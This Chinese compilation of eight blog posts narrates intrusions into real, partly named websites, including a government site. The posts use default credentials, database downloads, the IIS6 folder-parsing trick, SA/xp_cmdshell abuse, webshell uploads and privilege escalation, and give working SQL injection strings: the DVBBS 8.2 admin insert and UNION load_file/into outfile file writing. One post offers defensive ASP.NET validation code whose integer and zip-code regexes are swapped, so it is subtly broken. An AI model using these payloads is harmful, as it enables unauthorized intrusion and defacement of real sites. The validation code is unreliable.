再记一次网站入侵网站安全
“蕴林智”通过精心收集,向本站投稿了8篇再记一次网站入侵网站安全,下面是小编为大家整理后的再记一次网站入侵网站安全,仅供大家参考借鉴,希望大家喜欢,并能积极分享!
篇1:再记一次网站入侵网站安全
打开直接试了试默认的用户名和密码,结果用admin admin进去了
这个后台太简单了,估计不是这个网站的真正后台,是网站另一个组成部分的后台,没什么用,
再次浏览网站,未发现注入点,不过看到他有个BBS,打开看到版本是DVBBS8.0的。首先DVBBS8.0是有漏洞的,就看他有没有打补丁了,接着便从入侵最简单的猜测+默认开始,直接访问BBS后台提示登陆,用默认的admin admin888登陆失败,再次访问DVBBS数据库,看看能不能把它数据库下载下来,结果成功下载到了数据库,发现后台密码是默认的,可是怎么登陆不了呢?
对了,还有个前台密码,可能前台密码不是默认的吧,在DV_USER表中找到了前台密码,这次成功登陆进去了,
DVBBS8.0后台拿webshell网上教程一大堆,可以去百度一下。大体如下:
1.创建一个数据库文件并插入一句话马。
2.后缀改为rar或其他DVBBS支持上传的格式。
这里备份数据库要注意一下,以前我们拿DVBBS都是备份成asp格式,但现在DVBBS最了后缀限制了,那怎么搞呢?
记不记得IIS6.0的那个以.asp命名文件夹,该文件夹下的所有文件都会被当成asp文件执行的漏洞?关键就在这里了,我们备份一个目录名带.asp的。不就OK了?
本文来源于:尼克技术博客 www.ineeke.cn/ , 原文地址:www.ineeke.cn/archives/504/
篇2:一次简单的反入侵测试网站安全
文章: 唐不狐
某日小弟正在肉鸡上sniffe,正巧赶上某淫在扫我肉鸡的sa弱口令,先做了个ipsec阻断了对方对我肉鸡的扫描。对方ip直接在嗅探器里得到了:61.19.***.***.查了下,是泰国人妖的。直接ie里面键入地址还有个站。
初步地揣测:该ip是某淫的肉鸡,用来扫别人的。
偶接下来很风骚地揣测,那个某淫是不是也这样扫扫sa弱口令就日下这鸟鸡鸡呢?于是telnet 61.19.***.*** 1433 嘿,端口开着。本地查询分析器里sa,口令空。竟然就这么风骚地连上去了。当时那个心情:堪比小乔初嫁。
接下来的故事就不那么舒坦了。利用xp_cmdshell提示XX.DLL不在。OA、job、尝试上传删除的dll、xp_regwrite、沙盘...满清十大酷刑都用上了,人家依然坚挺。
爆数据,可怜人家里面毛东西,列目录也失败,
(插个经验:用咱blog上的伪造文件整出来的点pangolin检测不出来地,没有关键词,用NB即可。我想是判断的逻辑方式不一样)
sa日不下来都说是人品问题,俺那个伤心啊。接下来用s 扫了下1-10000的port开放情况,发现开有81在。于是ie里面61.19.***.***:81/ 打开看到个php页面,仔细看看还有phpinfo,于是得到web路径。
接下来就好办了。查询分析器里面log备份一个phpshell到web目录下,再写个大马上去就很爽地拿到webshell了。
执行net user的时候没反应,我还以为降权了呢。接着又试试ipconfig 有了。原来对net.exe,net1.exe做了手脚。记得邪八有兄台写了个现成的api加用户的工具adduser,顺利解决该问题。
接下来意气风发地连人家3389,用户名口令输入,进入加载界面,忽然弹出一错误窗口,小心肝咯噔一下差点没吃得消,仔细一读差点吐血:该系统需要激活!
当时那个恨啊!接着直接给它上了个马草草了事算了。几辈子没遇到这样地了。
篇3:入侵狐狸 学习网网站安全
文章作者:xh0507 [www.xh0507.cn] 狐狸 学习网 地址www.foxteam.cn/index.php【图1】
废话不说,直接进入主题,先看看这个站的建站时间 域名注册日: -5-14 21:23:00 【图2】
看来是个新站,可能有的地方的安全还没做到位,仅是个人猜想,我们先找找管理员的名字吧 【图3】
这个很重要,当你入侵一个站的时候,最起码知道这个站的管理员是谁吧。再看看str0m的个人资料,我们百度下【图4】
这里我们找到了管理员str0m的个人博客www.str0m.cn前面做的都是准备工作,让你对一个站的基本信息和管理人员有个了解。下面开始我们的行动:(分析)站点论坛程序版权为Phpwind,大家都知道这样的论坛,一般的注入,扫描几乎否没什么用,所以只能从别的方面去入手了。www.foxteam.cn >>60.172.190.207www.str0m.cn >>60.172.190.207检测管理员两个站点是同一个服务器的,下面我们旁注下这个服务器有哪些站点。foxteam.cn has the IP address: 60.172.190.207119 found with the IP 60.172.190.207【图5】
很幸运的是我找在服务器里到了一个站点www.XXX.com/movie.asp?id=3DB权限 当前库名:sqlsqlXXX 当前用户:sqlXXX[
既然有DB权限那我们就去列下服务器里的目录【图7】
119个站 要找我们的站点目录地址(有点难)我花了1小时左右就是找不到我们要入侵站点foxteam.cn的目录焦炉………………思考foxteam.cn和str0m.cn在同一个服务器,同一个管理员,那目录会不会是于str0m这个有关,继续寻找…………运气来了,【如图8】
找到了,后在寻看网站的物理地址的时候发现了一个致命的漏洞e:\clientweb\3g\str0m\wwwroot\kldtpb\eWebEditor【图9】
默认的后台 admin_login.asp下面就开始进入 eWebEditor后台【如图10】
这里管理员很疏忽忘了改密码! 默认账号:admin admin 后面的步骤就是 在 eWebEditor后台添加样样式管理 直接添加PHP木马,
(这个步骤就不详细写了…………)就这样一个 学习网成功拿下~【如图11】
篇4:入侵沸点联盟网站安全
沸点联盟:www.fd98.com/
就一论坛,叫我从PHPWIND入手难度太大了。还是旁注看看吧。
搜索:www.114best.com/ip/114?w=www.fd98.com
这里查到绑了43个站啊。嘿嘿。看来有戏了。
首先攻破的是这个站:www.lccistudy.com 有注入点。哎。还做 站。绑一起的站居然有注入!
但是进了后台硬是没拿下webshell。极度郁闷!
继续看吧。反正站很多。接下来是个BBS的。DVBBS8.0的数据库被我下下来了。但是MD5硬是没解出来。我就不截图了。
打开网站:www.zenwicom.com 的时候。一看就知道一老漏洞了,
本地上传漏洞。
这套系统拿webshell发就很多了。我是直接本地上传的。如果不行可以注入中转来拿到管理权限然后进去拿。我已经拿到了。
下面就是提权了。提权花了些时间。因为管理很BT。他把系统装到F盘。把3389端口改到33890
这些都是我慢慢发现的。我在SHELL里的查看可写目录里发现D盘的d:\web可读。
进去看了下居然是MYSQL的。ROOT账号密码就躺在那。
默默祈祷三秒种。希望我那webshell有PHP执行权限。传个SU.PHP发现可以。
下面就是提权了。首先导出udf.dll在执行命令。
然后就是终端登陆了。
拿这个站总得来说还是比较顺利的。
篇5:教你入侵dvbbs 8.2 论坛网站安全
中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本,漏洞存在源程序 login.asp
Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号,导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。
特别注意:admin等。。。必须在论坛有注册。。。
就是登陆名必须是已经在论坛注册了的。。
随便找了一个论坛www.*******.net/首先注册一个帐户“hxhack”然后访问其登陆页面
在用户名处写入“hxhack' and 'a'='a”密码随便登陆看到其返回信息如图
看用户名或密码不正确,然后我们在“hxhack' and 'a'='b”返回的信息如图
很明显我们能发现第一次提交正确和第二次提交的不正确时两者返回的信息有着明显的差别。就说明他是可以利用的。那我就来将我的帐户提升为管理员吧!在用户名处写入“';update dv_user set usergroupid=1 where username='hxhack'--”密码我就用正确的来写然后写好后登陆看到反回的信息
我们可以看到登陆提示为“本论坛不存在该用户名”这个就说明我们所提升的帐户“hxhack”已经为管理员了,
现在我们已经是前台管理员了。
那么怎样才能让我们的帐户具有后台权限呢?我们继续来到login.asp这个登陆页面。在用户名处写入“hxhack';insert into dv_admin (username,password,flag,adduser) values
('hxhack','a5258dfb597d7a1a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','hxhack')--”其中的“a5258dfb597d7a1a”是“hxhack”的MD5加密后的值,也就是说我们这里提升为后台管理权限的帐户的后台管理密码为“hxhack”。之后我们看看能否登陆后台,哈哈RP还行,成功了如图
接来呢就是看看能否拿到webshell甚至提权了。这里我就不搞了
好了其实这个漏洞并没有什么 ,至于ACCESS这个数据库的利用比较麻烦(本人比较懒就不搞了)!希望这篇菜鸟级的文章能给你一点收获。
篇6:网站安全:整站防止SQL注入式入侵
老邪的博客
SQL注入,通常一个一个文件修改不仅麻烦而且还有漏掉的危险,下面我说一下如何从整个系统防止注入,
做到以下三步,相信你的程序就会比较安全了,而且对整个网站的维护也将变的简单。
一、数据验证类
parameterCheck.cs
public class parameterCheck{
public static bool isEmail(string emailString){
return System.Text.RegularExpressions.Regex.IsMatch(emailString, “[’\\w_-]+(\\.
[’\\w_-]+)*@[’\\w_-]+(\\.[’\\w_-]+)*\\.[a-zA-Z]{2,4}”);
}
public static bool isInt(string intString){
return System.Text.RegularExpressions.Regex.IsMatch(intString ,“^(\\d{5}-\\d{4})|
(\\d{5})$”);
}
public static bool isUSZip(string zipString){
return System.Text.RegularExpressions.Regex.IsMatch(zipString ,“^-[0-9]+$|^[0-9]
+$”);
}
}二、Web.config
在你的Web.config文件中,在下面增加一个标签,如下:
USzip“ />
其中key是后面的值为“OrderId-int32”等,其中“-”前面表示参数的名称比如:OrderId,后面的int32表示数据类型。
三、Global.asax
在Global.asax中增加下面一段:
protected void Application_BeginRequest(Object sender, EVEntArgs e){
String[] safeParameters = System.Configuration.ConfigurationSettings.AppSettings
[”safeParameters“].ToString.Split(’,’);
for(int i= 0 ;i < safeParameters.Length; i++){
String parameterName = safeParameters[i].Split(’-’)[0];
String parameterType = safeParameters[i].Split(’-’)[1];
isValidParameter(parameterName, parameterType);
}
}
public void isValidParameter(string parameterName, string parameterType){
string parameterValue = Request.QueryString[parameterName];
if(parameterValue == null) return;
if(parameterType.Equals(”int32“)){
if(!parameterCheck.isInt(parameterValue)) Response.Redirect(”parameterError.aspx“);
}
else if (parameterType.Equals(”double“)){
if(!parameterCheck.isDouble(parameterValue)) Response.Redirect(”parameterError.aspx“);
}
else if (parameterType.Equals(”USzip“)){
if(!parameterCheck.isUSZip(parameterValue)) Response.Redirect(”parameterError.aspx“);
}
else if (parameterType.Equals(”email“)){
if(!parameterCheck.isEmail(parameterValue)) Response.Redirect(”parameterError.aspx");
}
}以后需要修改的时候我们只需要修改以上三个文件,对整个系统的维护将会大大提高效率,当然你可以根据自己的需要增加其它的变量参数和数据类型,
篇7:科讯科技0day入侵演示网站安全
现在程序在不断的发展,更新,漏洞也不断的出现。今天来给大家演示一下科讯的漏洞,简单拿大站的WebShell.在百度或者GOOGEL搜索,科讯的注册关键字,因为这个漏洞就出自于头像上传。关键字为(小提示:在输入用户名后,可以自动检查您想要的用户名是否已经被别人注册)
我们今天就拿第一个来演示,目标地址为(www.**.**.gov.cn) 图1
因为漏洞出在头像上传的地方,所以第一步,我们的先 注册一个用户。再在用户上传头像那里上传我们的ASP木马。已经写好了一个现成的科讯科技的漏洞利用工具。工具使用很简单。傻瓜化。图2
工具上有6个点击连接。
1.用户注册。2.头像上传。3修改目录拿WebShell.4.查看WebShell地址。5.程序的默认数据库下载。6读取程序的CONN文件把网站复制进去点击-打开-注册用户。图3
注册好了以后点击-头像上传,
上传我们的ASP木马,把后缀改为,JPG或者GIF。图4
上传好后点击-修改目录拿WebShell。会在www.qf.lg.gov.cn/Upfiles/User/xiaozi目录下生成一个为X.ASP的文件,而在X.ASP这个文件下就是你的图片大马。图5
直接点击-查看WebShell地址,在X.ASP的目录下就可以查看到我们的GIF木马的地址。 图6
点击-浏览就就能查看到我们图片木马的绝对途径。 图7
然后用我们的一句话木马连接。 图8
传我们免杀的ASP木马后成功得到WebShell. 图9
不知道大家看完后想起来什么没有?
其实这个漏洞跟动易的注册漏洞差不了多少。
漏洞演示到此为止。提权留给大家自己去领悟。
篇8:入侵某地方门户加PR网站安全
天挺无聊的,打开QQ也不知道和谁扯淡,最近在开个动漫站,正愁没有方法提高PR,正好看到某B在XX地上线了,在网上查了下XX地的门户www.xxxxxxx.com,查了下价值。觉得还过的去(图1),就去鸟他了。
图1
个人比较喜欢日PHP,于是在GG搜索inurl:.php site:xxxxxxx.com(图2),在黑框框内发现某分站的路径,接下来就搜索了inurl:.php site:www.xxxxxxx.com,发现一个PHP的点,用and 1=1和and 1=2,然后用order by 6/*发现有6个表,再访问www.xxxxxxx.com/xxxx/comxxx.php?classid=206 and 1=2 union select 1,2,3,4,5,6/*,显示出“2”(图3)
图2
图3
话说之前我们不是发现一个路径吗?估计分站的服务器文件配置和主站可能一样的,所以我们试试来读下APACHE的配置文件:“/usr/local/apache2/conf/httpd.conf”,转换后放入URL里访问:www.xxxxxxx.com/xxxx/comxxx.php?classid=206 and 1=2 union select 1, load_file(char(47,117,115,114,47,108,111,99,97,108,47,97,112,97,99,104,101,50,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)),3,4,5,6/*,
然后搜索关键字htdocs找到目录为/www/xxxxxx.com/www/,用工具看了下,发现magic_quotes_gpc=Off。嘿嘿,这样就好了,可以用OUTFILE INTO写文件进去,提交URL为:“www.xxxxxxx.com/xxxx/comxxx.php?classid=206/**/and/**/1=2/**/union/**/select/**/1,2,3,4,'by
yzy',6%20from user into
outfile
'/www/xxxxxx.com/www/yzy.txt'/*”这样文件就写上去了(图4)。
图4
接下来只要加上我站的连接就可以了,我只是为了PR,管理员叔叔不要怪我哦。Boku no iyaa,I’m coming.
【再记一次网站入侵网站安全】相关文章:
1.面试题网站
2.网站广告语
5.网站董事长发言稿
7.网站分销合同
8.网站年度工作计划
9.网站推广计划书
10.摄影网站策划书






文档为doc格式